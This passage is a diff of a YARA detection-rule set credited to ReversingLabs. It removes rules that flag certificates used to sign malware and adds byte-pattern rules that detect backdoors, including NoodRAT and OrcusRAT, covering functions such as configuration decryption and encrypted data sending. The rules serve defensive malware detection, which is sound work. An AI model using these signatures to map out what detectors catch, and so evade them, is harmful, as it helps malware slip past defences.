+            ?? ?? ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 1F ?? 91 13 ?? 02 7C ?? ?? ?? ?? 11 ??
+            8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 11 ?? 1F ?? 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 11 ??
+            28 ?? ?? ?? ?? 2A
+        }
+		$upload = {
+            28 ?? ?? ?? ?? 0A 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 2D ?? DD ?? ?? ?? ?? 16 0B 38 ??
+            ?? ?? ?? 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 0C 06 02 7C ?? ?? ?? ??
+            7B ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 28 ?? ?? ?? ?? 02 7C ?? ?? ?? ??
+            7B ?? ?? ?? ?? 1B 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 72 ?? ?? ?? ?? A2 11 ?? 17 02 7C ??
+            ?? ?? ?? 7B ?? ?? ?? ?? 07 6F ?? ?? ?? ?? A2 11 ?? 18 72 ?? ?? ?? ?? A2 11 ?? ?? 06
+            A2 11 ?? 1A 72 ?? ?? ?? ?? A2 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7C ?? ?? ?? ??
+            7B ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 07
+            14 6F ?? ?? ?? ?? 07 17 58 0B 07 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 3F
+            ?? ?? ?? ?? 02 7C ?? ?? ?? ?? 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7C ?? ?? ?? ?? 73 ??
+            ?? ?? ?? 7D ?? ?? ?? ?? DE 23 0D 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 09
+            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 2A
+        }
+		$perform_request = {
+            05 6F ?? ?? ?? ?? 0A 06 04 3D ?? ?? ?? ?? 06 04 19 5B 18 5A 3F ?? ?? ?? ?? 05 16 06
+            19 5B 6F ?? ?? ?? ?? 0B 05 06 19 5B 06 19 5B 6F ?? ?? ?? ?? 0C 05 06 19 5B 18 5A 6F
+            ?? ?? ?? ?? 0D 02 07 28 ?? ?? ?? ?? 0B 02 08 28 ?? ?? ?? ?? 0C 02 09 28 ?? ?? ?? ??
+            0D 1F ?? 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 03 A2 11 ?? 17 72 ?? ?? ?? ?? A2 11 ?? 18 07
+            A2 11 ?? 19 72 ?? ?? ?? ?? A2 11 ?? 1A 08 A2 11 ?? 1B 72 ?? ?? ?? ?? A2 11 ?? 1C 09
+            A2 11 ?? 1D 72 ?? ?? ?? ?? A2 11 ?? 1E 02 28 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ??
+            ?? A2 11 ?? 1F ?? 02 7B ?? ?? ?? ?? A2 11 ?? 28 ?? ?? ?? ?? 10 ?? 38 ?? ?? ?? ?? 06
+            04 19 5B 18 5A 3D ?? ?? ?? ?? 06 04 19 5B 3F ?? ?? ?? ?? 05 16 06 18 5B 6F ?? ?? ??
+            ?? 13 ?? 05 06 18 5B 6F ?? ?? ?? ?? 13 ?? 02 11 ?? 28 ?? ?? ?? ?? 13 ?? 02 11 ?? 28
+            ?? ?? ?? ?? 13 ?? 1F ?? 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 03 A2 11 ?? 17 72 ?? ?? ?? ??
+            A2 11 ?? 18 11 ?? A2 11 ?? 19 72 ?? ?? ?? ?? A2 11 ?? 1A 11 ?? A2 11 ?? 1B 72 ?? ??
+            ?? ?? A2 11 ?? 1C 02 28 ?? ?? ?? ?? A2 11 ?? 1D 72 ?? ?? ?? ?? A2 11 ?? 1E 02 7B ??
+            ?? ?? ?? A2 11 ?? 28 ?? ?? ?? ?? 10 ?? 2B ?? 02 05 28 ?? ?? ?? ?? 13 ?? 1D 8D ?? ??
+            ?? ?? 13 ?? 11 ?? 16 03 A2 11 ?? 17 72 ?? ?? ?? ?? A2 11 ?? 18 11 ?? A2 11 ?? 19 72
+            ?? ?? ?? ?? A2 11 ?? 1A 02 28 ?? ?? ?? ?? A2 11 ?? 1B 72 ?? ?? ?? ?? A2 11 ?? 1C 02
+            7B ?? ?? ?? ?? A2 11 ?? 28 ?? ?? ?? ?? 10 ?? 05 2A
+        }
+		$get_txt_record = {
+            14 0A 03 73 ?? ?? ?? ?? 0B 07 6F ?? ?? ?? ?? 0C 7E ?? ?? ?? ?? 1F ?? 73 ?? ?? ?? ??
+            0D 09 08 08 8E 69 6F ?? ?? ?? ?? 26 09 6F ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            09 12 ?? 6F ?? ?? ?? ?? 13 ?? 09 6F ?? ?? ?? ?? 07 11 ?? 6F ?? ?? ?? ?? 07 6F ?? ??
+            ?? ?? 13 ?? 28 ?? ?? ?? ?? 12 ?? 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? DE ?? 26 72 ??
+            ?? ?? ?? 13 ?? DE ?? 11 ?? 2A
+        }
+		$main_loop = {
+            73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 73 ?? ?? ?? ?? 80 ?? ??
+            ?? ?? 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 18 16 16 6F ?? ?? ?? ?? 0A 06 28
+            ?? ?? ?? ?? 2D ?? 2A 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 2A 7E ?? ??
+            ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 07 6F ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 12 ?? 7B ?? ?? ?? ?? 0D 12 ?? 7B
+            ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 7E ?? ?? ?? ?? 19 11 ?? 11 ??
+            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2D ?? 14 80 ?? ?? ?? ?? 2A 11 ?? 7E ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 11 ?? 17 58 13 ?? 11 ?? 09 32 ?? 7E ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 0B 73 ??
+            ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 6F ?? ?? ??
+            ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 7E ?? ?? ?? ?? 07
+            17 6F ?? ?? ?? ?? 13 ?? 11 ?? 7E ?? ?? ?? ?? 1A 16 16 6F ?? ?? ?? ?? 6F ?? ?? ?? ??
+            11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 DD ?? ?? ?? ?? 26 DE ?? 2A
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PlanView, Inc." and pe.signatures [ i ] . serial == "1f:4c:22:da:11:07:d2:0c:1e:da:04:56:9d:58:e5:73" and 1366156799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $unpack_response_p* ) ) and ( $upload ) and ( $perform_request ) and ( $get_txt_record ) and ( $main_loop )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_4Fe68D48634893D18De040D8F1C289D2 : INFO FILE
+rule REVERSINGLABS_Linux_Backdoor_Noodrat : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects NoodRAT backdoor."
 		author = "ReversingLabs"
-		id = "40aed582-2960-5b42-acde-7350a2595b4b"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "ac5eae27-dc42-5060-b639-c23c0bbabb50"
+		date = "2024-08-26"
+		modified = "2024-08-26"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L495-L511"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "41feebc8800a084ac369b5c5721b1362d371bd503b67823986bad2839157a4b0"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/backdoor/Linux.Backdoor.NoodRAT.yara#L1-L162"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2ec4a8ba7428054edb4dcdb6a00015b9758badf515f2c210bb946ba5402674d2"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "NoodRAT"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xinghua Yile Network Tech Co.,Ltd." and pe.signatures [ i ] . serial == "4f:e6:8d:48:63:48:93:d1:8d:e0:40:d8:f1:c2:89:d2" and 1371081600 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_6767Def972D6Ea702D8C8A53Af1832D3 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "c60497b4-5abe-52b0-aac9-88953ea6cdf1"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L513-L529"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "aa7f997449b4b8dcf488cfb7f45ee98ca540d39fb861f5b01ff4bb4aa1875b72"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$change_name_on_system_p1 = {
+            41 56 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 89 FB 48 8D BC 24 ?? ?? ?? ?? B8 ??
+            ?? ?? ?? B9 ?? ?? ?? ?? F3 48 AB 48 8D BC 24 ?? ?? ?? ?? B1 ?? F3 48 AB C6 84 24 ??
+            ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ??
+            C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ??
+            ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 0F B7 15
+            ?? ?? ?? ?? 66 89 55 ?? 4C 8D 65 ?? 0F B7 D2 BE ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ??
+            48 8D 94 24 ?? ?? ?? ?? 0F B7 75 ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ??
+            4C 89 E6 48 89 EF E8 ?? ?? ?? ?? 4C 8B 03 48 C7 C6 ?? ?? ?? ?? 4C 89 C7 B8 ?? ?? ??
+            ?? 48 89 F1 F2 AE 48 F7 D1 48 8D 14 31 48 89 EF 48 89 F1 F2 AE 48 89 CE 48 F7 D6 48
+            83 EE ?? 48 39 F2 72 ?? BE ?? ?? ?? ?? 4C 89 C7 E8 ?? ?? ?? ?? 48 89 EE 48 8B 3B E8
+            ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? B9
+            ?? ?? ?? ?? F3 48 AB 48 8D BC 24 ?? ?? ?? ?? B1 ?? F3 48 AB C6 84 24 ?? ?? ?? ?? ??
+            C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ??
+            ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ??
+            C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ??
+            ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ??
+            C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ??
+            ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48 8D B4 24 ?? ?? ?? ??
+            48 8D BC 24 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C2 B8 ?? ?? ?? ?? 48 85
+            D2 0F 8E ?? ?? ?? ?? 48 C7 C2 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? 48 89 D1 F2 AE 48
+        }
+		$change_name_on_system_p2 = {
+            89 CB 48 8D BC 24 ?? ?? ?? ?? 48 89 D1 F2 AE F7 D3 8D 5C 0B ?? 85 DB B8 ?? ?? ?? ??
+            0F 4E D8 48 8D B4 24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 48
+            89 EF B8 ?? ?? ?? ?? 48 C7 C1 ?? ?? ?? ?? F2 AE 48 F7 D1 48 8D 79 ?? 48 63 D3 48 63
+            FF 48 8D 7C 3D ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ??
+            ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ??
+            C6 84 24 ?? ?? ?? ?? ?? 48 8D B4 24 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 49 89 C6 48
+            8D B4 24 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C3 48 89 E7 B9 ??
+            ?? ?? ?? B8 ?? ?? ?? ?? F3 48 AB C6 07 ?? 48 89 E5 41 BC ?? ?? ?? ?? 41 BD ?? ?? ??
+            ?? EB ?? 48 89 EF 4C 89 E9 4C 89 E0 F3 48 AB C6 07 ?? 48 89 D9 BA ?? ?? ?? ?? BE ??
+            ?? ?? ?? 48 89 E7 E8 ?? ?? ?? ?? 85 C0 7E ?? 48 63 D0 4C 89 F1 BE ?? ?? ?? ?? 48 89
+            E7 E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 85 C0 74 ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89
+            F7 E8 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 85 C0 75 ?? 48 8D BC 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ??
+            ?? ?? ?? ?? ?? 48 8D B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? 85 C0 7E
+            ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ??
+            ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D 41 5E C3
+        }
+		$decrypt_configuration_p1 = {
+            41 57 41 56 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 89 7C 24 ?? 48 8D 9C 24 ?? ??
+            ?? ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 DF F3 48 AB C6 07 ?? 48 8D 54 24 ?? B1 ??
+            48 89 D7 F3 48 AB C6 44 24 ?? ?? C6 44 24 ?? ?? C6 44 24 ?? ?? C6 44 24 ?? ?? C6 44
+            24 ?? ?? C6 44 24 ?? ?? C6 44 24 ?? ?? C6 44 24 ?? ?? 48 8D 54 24 ?? 0F B7 35 ?? ??
+            ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 C7 C1 ?? ?? ??
+            ?? F2 AE 48 F7 D1 48 83 E9 ?? 48 81 F9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 0F 46 D1 BE ??
+            ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? C6 44 24 ?? ?? C6 44 24 ?? ?? 48 8D 74 24 ?? 48 89
+            DF E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 50 ?? 48 89 54 24 ?? C6 00 ?? 48
+            8D 74 24 ?? 48 89 D7 E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 48 ?? 48 89 4C
+            24 ?? C6 00 ?? 48 8D 74 24 ?? 48 89 CF E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 85 C0 0F 84
+            ?? ?? ?? ?? C6 00 ?? 48 8D B4 24 ?? ?? ?? ?? 48 C7 C5 ?? ?? ?? ?? 48 89 F7 41 BC ??
+            ?? ?? ?? 48 89 E9 44 89 E0 F2 AE 48 F7 D1 48 01 E9 48 8D 5C 24 ?? 48 81 F9 ?? ?? ??
+            ?? BA ?? ?? ?? ?? 48 0F 46 D1 48 89 DF E8 ?? ?? ?? ?? 48 89 DF 48 89 E9 44 89 E0 F2
+            AE 48 89 CD 48 F7 D5 83 ED ?? 8D 45 ?? 48 98 80 7C 04 ?? ?? 74 ?? 48 63 C5 C6 44 04
+            ?? ?? 83 C5 ?? 48 63 ED C6 44 2C ?? ?? 4C 8D 6C 24 ?? 4C 89 EB BD ?? ?? ?? ?? C7 44
+            24 ?? ?? ?? ?? ?? 66 C7 44 24 ?? ?? ?? 41 BC ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? 49 C7 C6 ?? ?? ?? ?? 4D 89 EF E9 ?? ?? ?? ?? 0F B6 03 3C ?? 75
+            ?? 44 8B 64 24 ?? 4D 6B E4 ?? 4C 03 64 24 ?? 49 8D 7C 24 ?? 83 7C 24 ?? ?? BA ?? ??
+            ?? ?? 0F 4E 54 24 ?? 48 63 D2 8B 74 24 ?? 48 8D 44 24 ?? 48 8D 34 30 E8
+        }
+		$decrypt_configuration_p2 = {
+            0F B7 54 24 ?? 66 41 89 54 24 ?? 83 44 24 ?? ?? 83 7C 24 ?? ?? 77 ?? 89 6C 24 ?? 41
+            BC ?? ?? ?? ?? EB ?? 3C ?? 75 ?? 48 8D 7B ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 66 89 44 24 ?? 44 89 64 24 ?? EB ?? 41 83 C4 ?? 83 C5 ?? 48 83 C3 ?? 4C 89 F1
+            4C 89 FF B8 ?? ?? ?? ?? F2 AE 48 F7 D1 48 83 E9 ?? 48 89 D8 4C 29 E8 48 39 C8 0F 82
+            ?? ?? ?? ?? 8B 4C 24 ?? 48 8B 54 24 ?? 89 8A ?? ?? ?? ?? 48 8D 5C 24 ?? B9 ?? ?? ??
+            ?? B8 ?? ?? ?? ?? 48 89 DF F3 48 AB 48 8B 7C 24 ?? 48 C7 C1 ?? ?? ?? ?? F2 AE 48 F7
+            D1 48 8D 51 ?? 48 8B 74 24 ?? 48 89 DF E8 ?? ?? ?? ?? 80 7C 24 ?? ?? 75 ?? 48 8B 44
+            24 ?? C6 80 ?? ?? ?? ?? ?? 80 7C 24 ?? ?? 75 ?? 48 8B 54 24 ?? C6 82 ?? ?? ?? ?? ??
+            80 7C 24 ?? ?? 75 ?? 48 8B 4C 24 ?? C6 81 ?? ?? ?? ?? ?? 80 7C 24 ?? ?? 75 ?? 48 8B
+            44 24 ?? C6 80 ?? ?? ?? ?? ?? 80 7C 24 ?? ?? 75 ?? 48 8B 54 24 ?? C6 82 ?? ?? ?? ??
+            ?? 80 7C 24 ?? ?? 75 ?? 48 8B 4C 24 ?? C6 81 ?? ?? ?? ?? ?? 80 7C 24 ?? ?? 75 ?? 48
+            8B 44 24 ?? C6 80 ?? ?? ?? ?? ?? 48 8D 5C 24 ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 89
+            DF F3 48 AB 48 8B 7C 24 ?? 48 C7 C1 ?? ?? ?? ?? F2 AE 48 F7 D1 48 83 E9 ?? 48 81 F9
+            ?? ?? ?? ?? BA ?? ?? ?? ?? 48 0F 46 D1 48 8B 74 24 ?? 48 89 DF E8 ?? ?? ?? ?? C6 44
+            24 ?? ?? C6 44 24 ?? ?? 48 8D 74 24 ?? 48 89 DF E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ??
+            ?? ?? 48 8D 7C 24 ?? B8 ?? ?? ?? ?? 48 C7 C1 ?? ?? ?? ?? F2 AE 48 F7 D1 83 E9 ?? 8D
+        }
+		$decrypt_configuration_p3 = {
+            41 ?? 48 98 80 7C 04 ?? ?? 74 ?? 48 63 C1 C6 44 04 ?? ?? 83 C1 ?? 48 63 C9 C6 44 0C
+            ?? ?? 4C 89 EB BD ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 49 C7
+            C4 ?? ?? ?? ?? 4C 8D 74 24 ?? 41 BF ?? ?? ?? ?? EB ?? 0F B6 03 3C ?? 75 ?? 8B 7C 24
+            ?? 48 8D 54 24 ?? 48 8D 3C 3A BA ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 54 24
+            ?? 48 81 C2 ?? ?? ?? ?? 48 8B 4C 24 ?? 66 89 44 91 ?? 0F B7 44 24 ?? 66 89 44 91 ??
+            83 44 24 ?? ?? 83 7C 24 ?? ?? 77 ?? 89 6C 24 ?? EB ?? 3C ?? 75 ?? 48 8D 7B ?? BA ??
+            ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 89 44 24 ?? 83 C5 ?? 48 83 C3 ?? 4C 89 E1
+            4C 89 F7 44 89 F8 F2 AE 48 F7 D1 48 83 E9 ?? 48 89 D8 4C 29 E8 48 39 C8 0F 82 ?? ??
+            ?? ?? 8B 4C 24 ?? 48 8B 54 24 ?? 89 8A ?? ?? ?? ?? EB ?? 48 8B 44 24 ?? C7 80 ?? ??
+            ?? ?? ?? ?? ?? ?? 48 8B 7C 24 ?? 48 83 C7 ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 85 C0 BA ?? ?? ?? ?? 0F 4E C2 48 8B 54 24 ?? 89 82 ?? ?? ?? ?? B8 ?? ?? ?? ??
+            EB ?? B8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D 41 5E 41 5F C3
+        }
+		$encrypt_and_send_data = {
+            48 89 5C 24 ?? 48 89 6C 24 ?? 4C 89 64 24 ?? 4C 89 6C 24 ?? 4C 89 74 24 ?? 4C 89 7C
+            24 ?? 48 83 EC ?? 41 89 FC 48 89 F5 49 89 D6 41 89 CD 48 85 F6 0F 84 ?? ?? ?? ?? BF
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C3 48 85 C0 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 89 03
+            0F B6 45 ?? 88 43 ?? 8B 6B ?? 48 8B 3D ?? ?? ?? ?? 48 83 C7 ?? E8 ?? ?? ?? ?? BA ??
+            ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 44 89 E9 BA ?? ?? ?? ?? 48 89 DE 44
+            89 E7 E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 3D ?? ?? ?? ?? 48 83 C7 ?? E8 ?? ?? ?? ?? 48
+            89 DF E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 85 ED 74
+            ?? 4D 85 F6 75 ?? 48 8B 3D ?? ?? ?? ?? 48 83 C7 ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9
+            ?? ?? ?? ?? 4C 63 FD 4C 89 FF E8 ?? ?? ?? ?? 48 89 C3 48 85 C0 74 ?? 4C 89 FA 4C 89
+            F6 48 89 C7 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 EE 48 89 DF E8 ?? ?? ?? ?? 44 89 E9 89
+            EA 48 89 DE 44 89 E7 E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 3D ?? ?? ?? ?? 48 83 C7 ?? E8
+            ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? 48 8B 3D ?? ?? ?? ?? 48 83
+            C7 ?? E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 48
+            8B 5C 24 ?? 48 8B 6C 24 ?? 4C 8B 64 24 ?? 4C 8B 6C 24 ?? 4C 8B 74 24 ?? 4C 8B 7C 24
+            ?? 48 83 C4 ?? C3
+        }
+		$receive_and_decrypt_data = {
+            48 89 5C 24 ?? 48 89 6C 24 ?? 4C 89 64 24 ?? 4C 89 6C 24 ?? 48 83 EC ?? 41 89 FC 48
+            89 F3 49 89 D5 89 CD 48 85 F6 74 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? BA ??
+            ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 8B 53 ?? 85 D2 74 ?? 4D 85 ED 75 ??
+            B8 ?? ?? ?? ?? EB ?? 81 FA ?? ?? ?? ?? 77 ?? 89 E9 4C 89 EE 44 89 E7 E8 ?? ?? ?? ??
+            85 C0 74 ?? 8B 73 ?? BA ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? B8
+            ?? ?? ?? ?? 48 8B 5C 24 ?? 48 8B 6C 24 ?? 4C 8B 64 24 ?? 4C 8B 6C 24 ?? 48 83 C4 ??
+            C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Guangzhou typical corner Network Technology Co., Ltd." and pe.signatures [ i ] . serial == "67:67:de:f9:72:d6:ea:70:2d:8c:8a:53:af:18:32:d3" and 1361750400 <= pe.signatures [ i ] . not_after )
+		uint32( 0 ) == 0x464C457F and ( ( all of ( $change_name_on_system_p* ) ) and ( all of ( $decrypt_configuration_p* ) ) and ( $encrypt_and_send_data ) and ( $receive_and_decrypt_data ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_06477E3425F1448995Ced539789E6842 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Orcusrat : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects OrcusRAT backdoor."
 		author = "ReversingLabs"
-		id = "21da6056-bf4e-5fc4-bef5-37010ebe8f05"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "d4700cd1-73a4-552d-bc27-7408508a28e7"
+		date = "2024-09-10"
+		modified = "2024-09-10"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L531-L547"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c0bc7808bb6bcc8273a887203c1b47d1a49fcb7719863e6bc97b5c7404a254f7"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/backdoor/ByteCode.MSIL.Backdoor.OrcusRAT.yara#L1-L134"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "17a85613e9e4c862ce81fee49065c250381dbf8a50cf07d496f5fd2c1b82d92e"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
